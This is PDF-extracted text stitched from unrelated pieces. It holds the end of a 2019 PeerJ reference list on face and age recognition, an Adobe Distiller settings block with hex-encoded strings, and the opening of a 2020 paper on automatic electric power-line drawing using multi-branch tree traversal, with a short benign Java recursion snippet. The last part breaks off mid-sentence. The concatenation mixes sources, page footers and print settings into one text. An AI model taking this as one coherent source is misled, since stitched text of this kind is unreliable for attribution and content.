Kalenichenko D, Wang W, Weyand T, Andreetto M, Adam H. 2017. MobileNets: efficient convolutional neural networks for mobile vision applications. Available at http://arxiv.org/abs/1704.04861. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 23/26 http://dx.doi.org/10.1016/j.patcog.2017.06.031 http://dx.doi.org/10.1109/tifs.2014.2359577 http://arxiv.org/abs/1901.07884 http://dx.doi.org/10.1016/j.patcog.2010.12.005 http://dx.doi.org/10.1109/mmul.2012.26 http://dx.doi.org/10.1109/tifs.2014.2359646 http://arxiv.org/abs/1707.05574 http://dx.doi.org/10.1109/tpami.2017.2738004 http://arxiv.org/abs/1707.03986 http://arxiv.org/abs/1704.04861 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ Huynh T, Min R, Dugelay J-L. 2012. An efficient LBP-based descriptor for facial depth images applied to gender recognition using RGB-D face data. In: Asian Conference on Computer Vision. Daejeon: Springer, 133–145. Kaya H, Gürpnar F, Salah AA. 2017. Video-based emotion recognition in the wild using deep transfer learning and score fusion. Image and Vision Computing 65:66–75 DOI 10.1016/j.imavis.2017.01.012. Kharchevnikova AS, Savchenko AV. 2016. The video-based age and gender recognition with convolution neural networks. In: International Conference on Network Analysis. Nizhny Novgorod: Springer, 37–46. Kharchevnikova AS, Savchenko AV. 2018. Neural networks in video-based age and gender recognition on mobile platforms. Optical Memory and Neural Networks 27(4):246–259 DOI 10.3103/s1060992x18040021. Kittler J, Hatef M, Duin RP, Matas J. 1998. On combining classifiers. IEEE Transactions on Pattern Analysis and Machine Intelligence 20(3):226–239. Klare BF, Klein B, Taborsky E, Blanton A, Cheney J, Allen K, Grother P, Mah A, Jain AK. 2015. Pushing the frontiers of unconstrained face detection and recognition: IARPA Janus Benchmark A. In: Proceedings of the International Conference on Computer Vision and Pattern Recognition (CVPR). Boston: IEEE, 1931–1939. Learned-Miller E, Huang GB, RoyChowdhury A, Li H, Hua G. 2016. Labeled faces in the wild: a survey. In: Kawulok M, Celebi M, Smolka B, eds. Advances in Face Detection and Facial Image Analysis. Cham: Springer, 189–248 DOI 10.1007/978-3-319-25958-1. Levi G, Hassner T. 2015. Age and gender classification using convolutional neural networks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition Workshops (CVPRW). Piscataway: IEEE, 34–42. Liu J, Deng Y, Bai T, Wei Z, Huang C. 2015. Targeting ultimate accuracy: face recognition via deep embedding. arXiv Available at http://arxiv.org/abs/1506.07310. Liu X, Kan M, Wu W, Shan S, Chen X. 2017a. VIPLFaceNet: an open source deep face recognition SDK. Frontiers of Computer Science 11(2):208–218 DOI 10.1007/s11704-016-6076-3. Liu W, Wen Y, Yu Z, Li M, Raj B, Song L. 2017b. SphereFace: deep hypersphere embedding for face recognition. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Vol. 1. Piscataway: IEEE. Manju A, Valarmathie P. 2015. Organizing multimedia big data using semantic based video content extraction technique. In: Proceedings of the International Conference on Soft-Computing and Networks Security (ICSNS). Coimbatore: IEEE, 1–4. Min R, Kose N, Dugelay J-L. 2014. Kinectfacedb: a Kinect database for face recognition. IEEE Transactions on Systems, Man, and Cybernetics: Systems 44(11):1534–1548 DOI 10.1109/tsmc.2014.2331215. Parkhi OM, Vedaldi A, Zisserman A. 2015. Deep face recognition. In: Proceedings of the British Conference on Machine Vision (BMVC), Swansea, UK, Vol. 1. 6. Pinto N, Stone Z, Zickler T, Cox D. 2011. Scaling up biologically-inspired computer vision: a case study in unconstrained face recognition on facebook. In: Proceedings of CVPRW. Piscataway: IEEE, 35–42. Ranjan R, Patel VM, Chellappa R. 2017. Hyperface: a deep multi-task learning framework for face detection, landmark localization, pose estimation, and gender recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence 41(1):121–135 DOI 10.1109/tpami.2017.2781233. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 24/26 http://dx.doi.org/10.1016/j.imavis.2017.01.012 http://dx.doi.org/10.3103/s1060992x18040021 http://dx.doi.org/10.1007/978-3-319-25958-1 http://arxiv.org/abs/1506.07310 http://dx.doi.org/10.1007/s11704-016-6076-3 http://dx.doi.org/10.1109/tsmc.2014.2331215 http://dx.doi.org/10.1109/tpami.2017.2781233 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ Rassadin A, Gruzdev A, Savchenko A. 2017. Group-level emotion recognition using transfer learning from face identification. In: Proceedings of the 19th ACM International Conference on Multimodal Interaction (ICMI). New York: ACM, 544–548. Rothe R, Timofte R, Van Gool L. 2015. DEX: deep expectation of apparent age from a single image. In: Proceedings of the IEEE International Conference on Computer Vision Workshops (CVPRW). Piscataway: IEEE, 10–15. Savchenko AV. 2016. Search techniques in intelligent classification systems. Basel: Springer. Savchenko A. 2018. Efficient statistical face recognition using trigonometric series and cnn features. In: 2018 24th International Conference on Pattern Recognition (ICPR). Piscataway: IEEE, 3262–3267. Savchenko AV. 2019. Sequential three-way decisions in multi-category image recognition with deep features based on distance factor. Information Sciences 489:18–36 DOI 10.1016/j.ins.2019.03.030. Savchenko AV, Belova NS. 2018. Unconstrained face identification using maximum likelihood of distances between deep off-the-shelf features. Expert Systems with Applications 108:170–182 DOI 10.1016/j.eswa.2018.04.039. Schroff F, Kalenichenko D, Philbin J. 2015. FaceNet: a unified embedding for face recognition and clustering. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition (CVPR), Boston, Massachusetts, USA, 815–823. Setty S, Husain M, Beham P, Gudavalli J, Kandasamy M, Vaddi R, Hemadri V, Karure J, Raju R, Rajan B, Kumar V, Jawahar C. 2013. Indian movie face database: a benchmark for face recognition under wide variations. In: Proceedings of the Fourth National Conference on Computer Vision, Pattern Recognition, Image Processing and Graphics (NCVPRIPG). Piscataway: IEEE, 1–5. Sharif Razavian A, Azizpour H, Sullivan J, Carlsson S. 2014. CNN features off-the-shelf: an astounding baseline for recognition. In: Proceedings of Conference on Computer Vision and Pattern Recognition Workshops (CVPRW). Piscataway: IEEE Computer Society, 806–813. Shi Y, Otto C, Jain AK. 2018. Face clustering: representation and pairwise constraints. IEEE Transactions on Information Forensics and Security 13(7):1626–1640 DOI 10.1109/tifs.2018.2796999. Sokolova AD, Kharchevnikova AS, Savchenko AV. 2017. Organizing multimedia data in video surveillance systems based on face verification with convolutional neural networks. In: Proceedings of the International Conference on Analysis of Images, Social Networks and Texts. Moscow: Springer, 223–230. Sun Y, Chen Y, Wang X, Tang X. 2014. Deep learning face representation by joint identification- verification. In: Advances in Neural Information Processing Systems, Montreal, Canada, 1988–1996. Sun Y, Liang D, Wang X, Tang X. 2015. DeepID3: Face recognition with very deep neural networks. arXiv Available at http://arxiv.org/abs/1502.00873. Taigman Y, Yang M, Ranzato M, Wolf L. 2014. DeepFace: closing the gap to human-level performance in face verification. In: Proceedings of the Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE, 1701–1708. Vascon S, Cristani M, Pelillo M, Murino V. 2013. Using dominant sets for k-NN prototype selection. In: International Conference on Image Analysis and Processing. Naples: Springer, 131–140. Wang F, Cheng J, Liu W, Liu H. 2018. Additive margin softmax for face verification. IEEE Signal Processing Letters 25(7):926–930 DOI 10.1109/lsp.2018.2822810. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 25/26 http://dx.doi.org/10.1016/j.ins.2019.03.030 http://dx.doi.org/10.1016/j.eswa.2018.04.039 http://dx.doi.org/10.1109/tifs.2018.2796999 http://arxiv.org/abs/1502.00873 http://dx.doi.org/10.1109/lsp.2018.2822810 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ Wen Y, Zhang K, Li Z, Qiao Y. 2016. A discriminative feature learning approach for deep face recognition. In: European Conference on Computer Vision. Amsterdam: Springer, 499–515. Wu X, He R, Sun Z, Tan T. 2018. A light CNN for deep face representation with noisy labels. IEEE Transactions on Information Forensics and Security 13(11):2884–2896 DOI 10.1109/tifs.2018.2833032. Yang T-Y, Huang Y-H, Lin Y-Y, Hsiu P-C, Chuang Y-Y. 2018. SSR-net: A compact soft stagewise regression network for age estimation. In: Proceedings of the International Joint Conference on Artificial Intelligence (IJCAI), Stockholm, Sweden, 1078–1084. Yoo B, Namjoon K, Changkyo L, Choi CK, JaeJoon H. 2018. Method and apparatus for recognizing object, and method and apparatus for training recognizer. US Patent 9,928,410. Available at https://patents.google.com/patent/EP3023911A1. Zagoruyko S, Komodakis N. 2016. Wide residual networks. arXiv Available at http://arxiv. org/abs/1605.07146. Zhang YJ, Lu H. 2002. A hierarchical organization scheme for video data. Pattern Recognition 35(11):2381–2387 DOI 10.1016/s0031-3203(01)00189-3. Zhang Z, Luo P, Loy CC, Tang X. 2016b. Joint face representation adaptation and clustering in videos. In: Proceedings of the European Conference on Computer Vision (ECCV). Amsterdam: Springer, 236–251. Zhang Z, Song Y, Qi H. 2017. Age progression/regression by conditional adversarial autoencoder. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE, 5810–5818. Zhang K, Zhang Z, Li Z, Qiao Y. 2016a. Joint face detection and alignment using multitask cascaded convolutional networks. IEEE Signal Processing Letters 23(10):1499–1503 DOI 10.1109/lsp.2016.2603342. Zhu C, Wen F, Sun J. 2011. A rank-order distance based clustering algorithm for face tagging. In: Proceedings of the International Conference on Computer Vision and Pattern Recognition (CVPR). Colorado Springs: IEEE, 481–488. Zhu P, Zhang L, Zuo W, Zhang D. 2013. From point to set: extend the learning of distance metrics. In: Proceedings of the International Conference on Computer Vision (ICCV). Piscataway: IEEE, 2664–2671. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 26/26 http://dx.doi.org/10.1109/tifs.2018.2833032 https://patents.google.com/patent/EP3023911A1 http://arxiv.org/abs/1605.07146 http://arxiv.org/abs/1605.07146 http://dx.doi.org/10.1016/s0031-3203(01)00189-3 http://dx.doi.org/10.1109/lsp.2016.2603342 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ Efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output ConvNet Introduction Related Works Multi-Output Convnet for Simultaneous Age, Gender, and Identity Recognition Proposed Pipeline for Organizing Photo and Video Albums Experimental Results Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_rs2wtgz7yna75cnukbqjaf3pn4 ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 DOI: 10.21307/ijanmc-2020-019 71 Design of Electric Power Line Drawing Algorithm Sun Pengzhan School of Computer Science and Engineering Xi'an Technological University Xi’an, 710021, China E-mail: 2994553975@qq.com Lei Juchao School of Computer Science and Engineering Xi'an Technological University Xi’an, 710021, China E-mail: leijuchao@139.com Abstract—At present, the drawing of power lines is still in the state of semi-manual design, mainly completed by AutoCAD, which not only consumes human resources, but also has low efficiency. Therefore, this paper designs an automatic drawing software for power lines. It integrates drawing and data management. Based on the basic information of power lines, this software imports and automatically converts the basic power data (latitude and longitude data) containing GPS/ BeidDou positioning information into the distance, direction, angle and other information of poles and cables. Then, it realizes the function of automatically drawing the power line graph according to the scale by multiple tree traversal algorithm. This software is easy to operate and reliable, and has achieved good results in practice. Keywords-Power Lines; Automatic Drawing; The Database; Multiple Tree; Traversal Algorithm I. INTRODUCTION The power grid is directly facing the end users and is closely related to the production and life of the people. It is an important public infrastructure to serve the people's livelihood. In recent years, with the development of new-type urbanization, China has been committed to the construction and renovation of power grid, so as to realize reliable power supply, high-quality service and improve supply efficiency. Power grid construction and reconstruction has become an urgent task of the current power industry. After the completion of the power grid transformation, the power supply enterprises need to draw and archive the power line diagram, which is usually drawn semi-manually by AutoCAD. However, AutoCAD requires professionals to use different drawing tools to draw on the software when drawing, and if it is necessary to change the position of a pole or change the information of a power line, it needs to be redrawn. Therefore, this kind of design method's shortcoming is obvious, not only the design workload is big, time-consuming, laborious, the efficiency is low, moreover has not been able to adapt to the electronic age development demand[1-2]. In order to realize the convenient drawing function, this paper designs and implements an automatic drawing software for power lines. The system can calculate various parameter information in the line through GPS data (longitude and latitude data) and store it in the database. Then it will automatically generate a standard and beautiful power circuit diagram according to the information stored in the database. If some information needs to be changed after the completion of power grid construction and reconstruction, only the corresponding data need to be changed to automatically draw again. This software provides a strong guarantee for reducing labor intensity, improving work efficiency and plotting quality, and shortening plotting cycle. II. POWER LINE STRUCTURE ANALYSIS Power equipment mainly includes generator set, power distribution device, lighthouse bridge column, fuse, transformer, transformer table, automatic control device, watt-hour meter, high-voltage switch, high-voltage circuit breaker, capacitor, lightning arrester, current transformer, voltage transformer, cable line, power line, etc. Since the generator set is not fixed on the power line, the power line mentioned in this system mainly refers to the line composed of outdoor poles, cables and transformer stations (including box transformers). Due to the wide coverage area of outdoor lines, the complex and changeable environment, and the diversified routing modes of the lines, the factors to be considered in drawing are also relatively complex. However, no matter how complicated and diverse the actual power lines are, all power lines are connected to the user end through transformer outgoing lines and several poles, so the power lines are essentially standard multi-branch tree structures. As shown in fig. 1, the power line in each area is essentially a mailto:yangyh26@qq.com International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 72 multi-branch tree with transformer as root node (node 0), and each pole in the line is a node of the multi-branch tree, i.e. T = {0,1,2,3,4,5,6,7} is a tree with root 0. The other nodes except the root node 0 can be divided into n disjoint finite sets, each set is a subtree of the root node[3]. Figure 1. Schematic diagram of power line multi-branch tree structure In the actual drawing process, whether manual drawing or automatic drawing, transformer is generally selected as the starting point. The process is: starting from the starting point to find the next pole connected to it through the relationship between the nodes, get the parameters of the node and the parent node, such as the distance, rotation angle, steering and other parameters, and then calculate the relative coordinates of the node. This drawing process is also very similar to the traversal process of a multi-fork tree, which provides the possibility for the realization of automatic power drawing. In the actual circuit drawing process, the four basic data sources of gear length, angle, steering, and pole number can be obtained during power grid reconstruction or power grid construction, or GPS can be used to obtain the latitude and longitude information of the pole and then converted to span, veer and angle. The automatic drawing of power lines can be realized by processing the four parameters in the database while traversing each node, calculating the relative coordinates of each node and converting them into absolute coordinates. III. POWER LINE AUTOMATIC DRAWING FUNCTION DESIGN A. Traversal of Multi-fork Trees Since the relationship between transformer and pole is tree structure, when drawing circuit diagram, this multi-branch tree can be constructed by traversing power lines and all nodes in the tree can be processed one by one. Therefore, it has the possibility to realize the automatic drawing of power line graphics. Common multi-tree traversal can be divided into two types: level-first traversal and depth-first traversal. Depth first traversal can be divided into: first order traversal, middle order traversal, and second order traversal. Its principle is to traverse the nodes of the tree along its depth and search the branches of the tree as deep as possible. Hierarchy priority traversal is to traverse the nodes of the tree according to hierarchy. Its principle is to first visit the root node and find all its children. These sub-nodes are also the root nodes of the sub-tree, so these nodes are accessed again, and so on and so forth, in order of first, second, third, etc[4]. B. Power Line Traversal Algorithm Although the power line graph has a multi-branch tree structure, there are many problems in the actual traversal operation. In the past multi-tree applications, whether it is depth traversal or hierarchical traversal, the node stores the node's sub-node information when it is stored, so its sub-nodes can be directly found by accessing the node, and traversal can be completed from top to bottom. However, in power lines, because each pole node only knows its parent node but not its child node and has no other relationship information, it is difficult to determine the location of other nodes except the root node, so the traditional traversal algorithm is not applicable. In order to solve this problem, this research has made some improvements on the basis of the hierarchical traversal algorithm. Because the information of each node's parent node is clear, we can easily find all the nodes with the same parent node. This research is based on this point to achieve top-down traversal. First, create an instance class object “Tree”, which represents that each row of data in the database is an instance object in java, and create an attribute “children” in the instance object Tree to save all child nodes of the current node. Second, get the data in the database to the instance object, and save all the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 73 instance objects in the list collection. The specific traversal algorithm is to find the root node and put it into the result, and use the children attribute to find all the child nodes of the current layer from top to bottom through recursion, and save them in the result. Recursive traversal code is as follows. //Store all node data information object collection List<Tree> result = new ArrayList<Tree>(); //Query node data information List<Tree> lists = new TestJDBC().queryAll(); //Traverse to determine whether it is the root node for (Tree tree : lists) { if(null == tree.getPid()) { result.add(tree); } } // Recursive call judgment function for (Tree parent : result) { parent = recursiveTree(parent, lists); } //Judgment function adds an object to the child attribute of the parent node object public static Tree recursiveTree(Tree parent, List<Tree> list) { for (Tree tree : list) { if(parent.getId().equals(tree.getPid())) { tree = recursiveTree(tree, list); parent.getChildren().add(tree); } } return parent; } C. Calculation of Plane Coordinates The purpose of traversal is not only to construct the multi tree, but also to locate the coordinates of the traversal nodes. It is very important to convert the latitude and longitude data of the pole to the coordinate points 